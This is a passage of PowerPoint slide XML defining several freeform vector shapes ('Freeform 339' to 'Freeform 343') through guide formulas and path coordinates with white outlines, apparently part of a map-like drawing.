                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36206" name="Freeform 339"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="87" y="1923"/>
                <a:ext cx="12" cy="15"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 12"/>
                  <a:gd name="T1" fmla="*/ 15 h 15"/>
                  <a:gd name="T2" fmla="*/ 2 w 12"/>
                  <a:gd name="T3" fmla="*/ 8 h 15"/>
                  <a:gd name="T4" fmla="*/ 0 w 12"/>
                  <a:gd name="T5" fmla="*/ 2 h 15"/>
                  <a:gd name="T6" fmla="*/ 6 w 12"/>
                  <a:gd name="T7" fmla="*/ 0 h 15"/>
                  <a:gd name="T8" fmla="*/ 9 w 12"/>
                  <a:gd name="T9" fmla="*/ 1 h 15"/>
                  <a:gd name="T10" fmla="*/ 12 w 12"/>
                  <a:gd name="T11" fmla="*/ 4 h 15"/>
                  <a:gd name="T12" fmla="*/ 10 w 12"/>
                  <a:gd name="T13" fmla="*/ 8 h 15"/>
                  <a:gd name="T14" fmla="*/ 9 w 12"/>
                  <a:gd name="T15" fmla="*/ 8 h 15"/>
                  <a:gd name="T16" fmla="*/ 8 w 12"/>
                  <a:gd name="T17" fmla="*/ 12 h 15"/>
                  <a:gd name="T18" fmla="*/ 6 w 12"/>
                  <a:gd name="T19" fmla="*/ 13 h 15"/>
                  <a:gd name="T20" fmla="*/ 4 w 12"/>
                  <a:gd name="T21" fmla="*/ 15 h 1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2"/>
                  <a:gd name="T34" fmla="*/ 0 h 15"/>
                  <a:gd name="T35" fmla="*/ 12 w 12"/>
                  <a:gd name="T36" fmla="*/ 15 h 15"/>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2" h="15">
                    <a:moveTo>
                      <a:pt x="4" y="15"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36207" name="Freeform 340"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="121" y="1894"/>
                <a:ext cx="28" cy="20"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 28"/>
                  <a:gd name="T1" fmla="*/ 9 h 20"/>
                  <a:gd name="T2" fmla="*/ 27 w 28"/>
                  <a:gd name="T3" fmla="*/ 10 h 20"/>
                  <a:gd name="T4" fmla="*/ 23 w 28"/>
                  <a:gd name="T5" fmla="*/ 12 h 20"/>
                  <a:gd name="T6" fmla="*/ 15 w 28"/>
                  <a:gd name="T7" fmla="*/ 12 h 20"/>
                  <a:gd name="T8" fmla="*/ 12 w 28"/>
                  <a:gd name="T9" fmla="*/ 13 h 20"/>
                  <a:gd name="T10" fmla="*/ 9 w 28"/>
                  <a:gd name="T11" fmla="*/ 19 h 20"/>
                  <a:gd name="T12" fmla="*/ 7 w 28"/>
                  <a:gd name="T13" fmla="*/ 20 h 20"/>
                  <a:gd name="T14" fmla="*/ 1 w 28"/>
                  <a:gd name="T15" fmla="*/ 18 h 20"/>
                  <a:gd name="T16" fmla="*/ 0 w 28"/>
                  <a:gd name="T17" fmla="*/ 15 h 20"/>
                  <a:gd name="T18" fmla="*/ 3 w 28"/>
                  <a:gd name="T19" fmla="*/ 11 h 20"/>
                  <a:gd name="T20" fmla="*/ 7 w 28"/>
                  <a:gd name="T21" fmla="*/ 7 h 20"/>
                  <a:gd name="T22" fmla="*/ 14 w 28"/>
                  <a:gd name="T23" fmla="*/ 5 h 20"/>
                  <a:gd name="T24" fmla="*/ 20 w 28"/>
                  <a:gd name="T25" fmla="*/ 0 h 20"/>
                  <a:gd name="T26" fmla="*/ 23 w 28"/>
                  <a:gd name="T27" fmla="*/ 2 h 20"/>
                  <a:gd name="T28" fmla="*/ 26 w 28"/>
                  <a:gd name="T29" fmla="*/ 4 h 20"/>
                  <a:gd name="T30" fmla="*/ 28 w 28"/>
                  <a:gd name="T31" fmla="*/ 9 h 2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8"/>
                  <a:gd name="T49" fmla="*/ 0 h 20"/>
                  <a:gd name="T50" fmla="*/ 28 w 28"/>
                  <a:gd name="T51" fmla="*/ 20 h 2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8" h="20">
                    <a:moveTo>
                      <a:pt x="28" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="27" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="9"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36208" name="Freeform 341"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="149" y="1889"/>
                <a:ext cx="8" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 8"/>
                  <a:gd name="T1" fmla="*/ 9 h 9"/>
                  <a:gd name="T2" fmla="*/ 1 w 8"/>
                  <a:gd name="T3" fmla="*/ 6 h 9"/>
                  <a:gd name="T4" fmla="*/ 0 w 8"/>
                  <a:gd name="T5" fmla="*/ 2 h 9"/>
                  <a:gd name="T6" fmla="*/ 2 w 8"/>
                  <a:gd name="T7" fmla="*/ 0 h 9"/>
                  <a:gd name="T8" fmla="*/ 7 w 8"/>
                  <a:gd name="T9" fmla="*/ 3 h 9"/>
                  <a:gd name="T10" fmla="*/ 8 w 8"/>
                  <a:gd name="T11" fmla="*/ 5 h 9"/>
                  <a:gd name="T12" fmla="*/ 7 w 8"/>
                  <a:gd name="T13" fmla="*/ 7 h 9"/>
                  <a:gd name="T14" fmla="*/ 4 w 8"/>
                  <a:gd name="T15" fmla="*/ 9 h 9"/>
                  <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T18" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T19" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T20" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T21" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T22" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T23" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T24" fmla="*/ 0 w 8"/>
                  <a:gd name="T25" fmla="*/ 0 h 9"/>
                  <a:gd name="T26" fmla="*/ 8 w 8"/>
                  <a:gd name="T27" fmla="*/ 9 h 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8" h="9">
                    <a:moveTo>
                      <a:pt x="4" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="9"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36209" name="Freeform 342"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="159" y="1872"/>
                <a:ext cx="36" cy="20"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 36"/>
                  <a:gd name="T1" fmla="*/ 20 h 20"/>
                  <a:gd name="T2" fmla="*/ 1 w 36"/>
                  <a:gd name="T3" fmla="*/ 20 h 20"/>
                  <a:gd name="T4" fmla="*/ 0 w 36"/>
                  <a:gd name="T5" fmla="*/ 17 h 20"/>
                  <a:gd name="T6" fmla="*/ 0 w 36"/>
                  <a:gd name="T7" fmla="*/ 13 h 20"/>
                  <a:gd name="T8" fmla="*/ 6 w 36"/>
                  <a:gd name="T9" fmla="*/ 10 h 20"/>
                  <a:gd name="T10" fmla="*/ 8 w 36"/>
                  <a:gd name="T11" fmla="*/ 8 h 20"/>
                  <a:gd name="T12" fmla="*/ 13 w 36"/>
                  <a:gd name="T13" fmla="*/ 2 h 20"/>
                  <a:gd name="T14" fmla="*/ 16 w 36"/>
                  <a:gd name="T15" fmla="*/ 1 h 20"/>
                  <a:gd name="T16" fmla="*/ 20 w 36"/>
                  <a:gd name="T17" fmla="*/ 0 h 20"/>
                  <a:gd name="T18" fmla="*/ 30 w 36"/>
                  <a:gd name="T19" fmla="*/ 3 h 20"/>
                  <a:gd name="T20" fmla="*/ 36 w 36"/>
                  <a:gd name="T21" fmla="*/ 6 h 20"/>
                  <a:gd name="T22" fmla="*/ 35 w 36"/>
                  <a:gd name="T23" fmla="*/ 8 h 20"/>
                  <a:gd name="T24" fmla="*/ 33 w 36"/>
                  <a:gd name="T25" fmla="*/ 9 h 20"/>
                  <a:gd name="T26" fmla="*/ 27 w 36"/>
                  <a:gd name="T27" fmla="*/ 8 h 20"/>
                  <a:gd name="T28" fmla="*/ 24 w 36"/>
                  <a:gd name="T29" fmla="*/ 9 h 20"/>
                  <a:gd name="T30" fmla="*/ 16 w 36"/>
                  <a:gd name="T31" fmla="*/ 11 h 20"/>
                  <a:gd name="T32" fmla="*/ 14 w 36"/>
                  <a:gd name="T33" fmla="*/ 14 h 20"/>
                  <a:gd name="T34" fmla="*/ 6 w 36"/>
                  <a:gd name="T35" fmla="*/ 20 h 2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36"/>
                  <a:gd name="T55" fmla="*/ 0 h 20"/>
                  <a:gd name="T56" fmla="*/ 36 w 36"/>
                  <a:gd name="T57" fmla="*/ 20 h 20"/>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36" h="20">
                    <a:moveTo>
                      <a:pt x="6" y="20"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="20"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36210" name="Freeform 343"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1588" y="328"/>
                <a:ext cx="952" cy="1428"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 708 w 952"/>
                  <a:gd name="T1" fmla="*/ 1028 h 1428"/>
                  <a:gd name="T2" fmla="*/ 799 w 952"/>
                  <a:gd name="T3" fmla="*/ 1038 h 1428"/>
                  <a:gd name="T4" fmla="*/ 704 w 952"/>
                  <a:gd name="T5" fmla="*/ 1112 h 1428"/>
                  <a:gd name="T6" fmla="*/ 643 w 952"/>
                  <a:gd name="T7" fmla="*/ 1110 h 1428"/>
                  <a:gd name="T8" fmla="*/ 605 w 952"/>
                  <a:gd name="T9" fmla="*/ 1195 h 1428"/>
                  <a:gd name="T10" fmla="*/ 555 w 952"/>
                  <a:gd name="T11" fmla="*/ 1198 h 1428"/>
                  <a:gd name="T12" fmla="*/ 518 w 952"/>
                  <a:gd name="T13" fmla="*/ 1250 h 1428"/>
                  <a:gd name="T14" fmla="*/ 502 w 952"/>
                  <a:gd name="T15" fmla="*/ 1284 h 1428"/>
                  <a:gd name="T16" fmla="*/ 486 w 952"/>
                  <a:gd name="T17" fmla="*/ 1319 h 1428"/>
                  <a:gd name="T18" fmla="*/ 477 w 952"/>
                  <a:gd name="T19" fmla="*/ 1378 h 1428"/>
                  <a:gd name="T20" fmla="*/ 468 w 952"/>
                  <a:gd name="T21" fmla="*/ 1426 h 1428"/>
                  <a:gd name="T22" fmla="*/ 429 w 952"/>
                  <a:gd name="T23" fmla="*/ 1395 h 1428"/>
                  <a:gd name="T24" fmla="*/ 392 w 952"/>
                  <a:gd name="T25" fmla="*/ 1395 h 1428"/>
                  <a:gd name="T26" fmla="*/ 356 w 952"/>
                  <a:gd name="T27" fmla="*/ 1343 h 1428"/>
                  <a:gd name="T28" fmla="*/ 336 w 952"/>
                  <a:gd name="T29" fmla="*/ 1295 h 1428"/>
                  <a:gd name="T30" fmla="*/ 338 w 952"/>
                  <a:gd name="T31" fmla="*/ 1270 h 1428"/>
                  <a:gd name="T32" fmla="*/ 308 w 952"/>
                  <a:gd name="T33" fmla="*/ 1215 h 1428"/>
                  <a:gd name="T34" fmla="*/ 312 w 952"/>
                  <a:gd name="T35" fmla="*/ 1173 h 1428"/>
                  <a:gd name="T36" fmla="*/ 303 w 952"/>
                  <a:gd name="T37" fmla="*/ 1148 h 1428"/>
                  <a:gd name="T38" fmla="*/ 352 w 952"/>
                  <a:gd name="T39" fmla="*/ 1134 h 1428"/>
                  <a:gd name="T40" fmla="*/ 343 w 952"/>
                  <a:gd name="T41" fmla="*/ 1106 h 1428"/>
                  <a:gd name="T42" fmla="*/ 340 w 952"/>
                  <a:gd name="T43" fmla="*/ 1044 h 1428"/>
                  <a:gd name="T44" fmla="*/ 315 w 952"/>
                  <a:gd name="T45" fmla="*/ 1009 h 1428"/>
                  <a:gd name="T46" fmla="*/ 326 w 952"/>
                  <a:gd name="T47" fmla="*/ 970 h 1428"/>
                  <a:gd name="T48" fmla="*/ 271 w 952"/>
                  <a:gd name="T49" fmla="*/ 969 h 1428"/>
                  <a:gd name="T50" fmla="*/ 273 w 952"/>
                  <a:gd name="T51" fmla="*/ 872 h 1428"/>
                  <a:gd name="T52" fmla="*/ 189 w 952"/>
                  <a:gd name="T53" fmla="*/ 705 h 1428"/>
                  <a:gd name="T54" fmla="*/ 95 w 952"/>
                  <a:gd name="T55" fmla="*/ 717 h 1428"/>
                  <a:gd name="T56" fmla="*/ 24 w 952"/>
                  <a:gd name="T57" fmla="*/ 642 h 1428"/>
                  <a:gd name="T58" fmla="*/ 91 w 952"/>
                  <a:gd name="T59" fmla="*/ 588 h 1428"/>
                  <a:gd name="T60" fmla="*/ 14 w 952"/>
                  <a:gd name="T61" fmla="*/ 577 h 1428"/>
                  <a:gd name="T62" fmla="*/ 73 w 952"/>
                  <a:gd name="T63" fmla="*/ 481 h 1428"/>
                  <a:gd name="T64" fmla="*/ 97 w 952"/>
                  <a:gd name="T65" fmla="*/ 406 h 1428"/>
                  <a:gd name="T66" fmla="*/ 184 w 952"/>
                  <a:gd name="T67" fmla="*/ 281 h 1428"/>
                  <a:gd name="T68" fmla="*/ 229 w 952"/>
                  <a:gd name="T69" fmla="*/ 199 h 1428"/>
                  <a:gd name="T70" fmla="*/ 320 w 952"/>
                  <a:gd name="T71" fmla="*/ 187 h 1428"/>
                  <a:gd name="T72" fmla="*/ 391 w 952"/>
                  <a:gd name="T73" fmla="*/ 176 h 1428"/>
                  <a:gd name="T74" fmla="*/ 477 w 952"/>
                  <a:gd name="T75" fmla="*/ 49 h 1428"/>
                  <a:gd name="T76" fmla="*/ 618 w 952"/>
                  <a:gd name="T77" fmla="*/ 13 h 1428"/>
                  <a:gd name="T78" fmla="*/ 759 w 952"/>
                  <a:gd name="T79" fmla="*/ 93 h 1428"/>
                  <a:gd name="T80" fmla="*/ 716 w 952"/>
                  <a:gd name="T81" fmla="*/ 168 h 1428"/>
                  <a:gd name="T82" fmla="*/ 665 w 952"/>
                  <a:gd name="T83" fmla="*/ 222 h 1428"/>
                  <a:gd name="T84" fmla="*/ 805 w 952"/>
                  <a:gd name="T85" fmla="*/ 228 h 1428"/>
                  <a:gd name="T86" fmla="*/ 827 w 952"/>
                  <a:gd name="T87" fmla="*/ 263 h 1428"/>
                  <a:gd name="T88" fmla="*/ 941 w 952"/>
                  <a:gd name="T89" fmla="*/ 237 h 1428"/>
                  <a:gd name="T90" fmla="*/ 865 w 952"/>
                  <a:gd name="T91" fmla="*/ 366 h 1428"/>
                  <a:gd name="T92" fmla="*/ 844 w 952"/>
                  <a:gd name="T93" fmla="*/ 444 h 1428"/>
                  <a:gd name="T94" fmla="*/ 816 w 952"/>
                  <a:gd name="T95" fmla="*/ 586 h 1428"/>
                  <a:gd name="T96" fmla="*/ 845 w 952"/>
                  <a:gd name="T97" fmla="*/ 623 h 1428"/>
                  <a:gd name="T98" fmla="*/ 809 w 952"/>
                  <a:gd name="T99" fmla="*/ 661 h 1428"/>
                  <a:gd name="T100" fmla="*/ 844 w 952"/>
                  <a:gd name="T101" fmla="*/ 759 h 1428"/>
                  <a:gd name="T102" fmla="*/ 851 w 952"/>
                  <a:gd name="T103" fmla="*/ 809 h 1428"/>
                  <a:gd name="T104" fmla="*/ 829 w 952"/>
                  <a:gd name="T105" fmla="*/ 854 h 1428"/>
                  <a:gd name="T106" fmla="*/ 754 w 952"/>
                  <a:gd name="T107" fmla="*/ 865 h 1428"/>
                  <a:gd name="T108" fmla="*/ 742 w 952"/>
                  <a:gd name="T109" fmla="*/ 912 h 1428"/>
                  <a:gd name="T110" fmla="*/ 808 w 952"/>
                  <a:gd name="T111" fmla="*/ 983 h 1428"/>
                  <a:gd name="T112" fmla="*/ 764 w 952"/>
                  <a:gd name="T113" fmla="*/ 984 h 1428"/>
                  <a:gd name="T114" fmla="*/ 283 w 952"/>
                  <a:gd name="T115" fmla="*/ 1054 h 1428"/>
                  <a:gd name="T116" fmla="*/ 327 w 952"/>
                  <a:gd name="T117" fmla="*/ 1063 h 1428"/>
                  <a:gd name="T118" fmla="*/ 784 w 952"/>
                  <a:gd name="T119" fmla="*/ 908 h 1428"/>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952"/>
                  <a:gd name="T181" fmla="*/ 0 h 1428"/>
                  <a:gd name="T182" fmla="*/ 952 w 952"/>
                  <a:gd name="T183" fmla="*/ 1428 h 1428"/>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952" h="1428">
                    <a:moveTo>
                      <a:pt x="726" y="966"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="741" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="743" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="984"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="987"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="989"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="713" y="990"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="706" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="1011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="1031"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="1037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="779" y="1037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="786" y="1037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="795" y="1037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="799" y="1038"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="790" y="1051"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="779" y="1061"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="1071"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="1071"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="1069"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="749" y="1082"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="1092"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="1101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="1107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="1108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="1109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="1112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="1112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="1115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="1119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="1120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="1112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="1113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="1130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="663" y="1132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="659" y="1131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="1127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="1119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="1110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="1106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="1106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="1110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="1130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="1135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="628" y="1144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="1151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="1168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="1180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="605" y="1195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="1200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="1201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="1196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="1206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="1216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="1221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="1219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="1220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="1228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="1198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="1198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="1198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="1194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="1202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="1210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="1217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="1224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="1227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="526" y="1227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="1228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="1235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="1242"/>
